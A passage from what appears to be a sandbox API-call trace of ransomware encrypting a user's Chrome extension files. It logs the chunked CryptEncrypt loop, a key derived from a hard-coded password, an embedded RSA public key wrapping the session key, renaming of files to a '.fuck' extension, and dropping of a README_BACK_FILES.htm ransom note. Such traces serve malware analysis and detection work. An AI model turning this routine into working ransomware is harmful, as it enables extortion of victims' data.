nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.058] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.058] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.058] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.058] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.058] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.058] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.058] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.058] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.059] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.059] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.059] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.059] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.059] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.059] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.059] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.059] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.059] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.059] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.059] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.059] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.060] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.060] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.060] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.060] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.060] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.060] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.060] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.060] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.060] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.060] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.060] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.060] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.060] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xf2, lpOverlapped=0x0) returned 1 [0263.060] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xf2, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x100) returned 1 [0263.060] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x100, lpOverlapped=0x0) returned 1 [0263.060] CloseHandle (hObject=0x5d60) returned 1 [0263.061] CloseHandle (hObject=0x5d5c) returned 1 [0263.061] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\messages.json"), bFailIfExists=0) returned 1 [0263.063] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\messages.json", dwFileAttributes=0x0) returned 1 [0263.063] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\messages.json.gsg")) returned 1 [0263.065] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\messages.json.fuck")) returned 1 [0263.066] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0263.066] CryptDestroyKey (hKey=0x2e7de00) returned 1 [0263.066] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0263.066] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0263.066] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0263.066] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\readme_back_files.htm")) returned 0xffffffff [0263.066] AreFileApisANSI () returned 1 [0263.066] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x275c330, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 162 [0263.066] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hr\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0263.067] GetFileType (hFile=0x5d64) returned 0x1 [0263.067] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0263.068] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0263.068] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0263.068] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0263.068] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0263.068] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0263.068] GetLastError () returned 0x0 [0263.068] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\messages.json")) returned 0x20 [0263.069] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\messages.json", dwFileAttributes=0x80) returned 1 [0263.069] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0263.070] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0263.070] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0263.071] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7a500) returned 1 [0263.073] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0263.073] lstrlenA (lpString="nyVZwrEPeJcSGZnLzNUpNIeDzMlQm") returned 29 [0263.073] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb3f0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0263.073] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7de00) returned 1 [0263.073] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----o", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0263.073] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0263.073] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e73e78) returned 1 [0263.073] CryptImportPublicKeyInfo (in: hCryptProv=0x2e73e78, dwCertEncodingType=0x1, pInfo=0x2eadeb0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eadee0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eadee8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7e200) returned 1 [0263.073] CryptEncrypt (in: hKey=0x2e7e200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0263.074] CryptEncrypt (in: hKey=0x2e7e200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e741a8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e741a8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0263.074] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e741a8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e741a8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0263.075] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.087] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.087] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.099] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.099] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.099] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.099] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.100] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.100] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.100] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.100] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.100] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.100] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.100] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.100] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.100] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.100] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.100] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.100] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.100] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.100] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.100] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.100] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.100] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, 